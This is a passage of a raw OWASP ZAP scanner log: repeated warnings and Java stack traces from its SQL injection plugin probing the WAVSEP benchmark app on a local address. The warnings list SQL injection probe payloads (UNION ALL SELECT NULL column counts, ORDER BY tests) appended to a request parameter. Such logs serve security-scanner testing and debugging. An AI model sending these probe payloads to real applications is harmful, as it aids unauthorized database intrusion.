org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962873 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962875 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962876 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962877 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962879 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962881 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962882 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 4566-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 4566-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962884 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962885 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962887 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962888 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962889 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962891 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 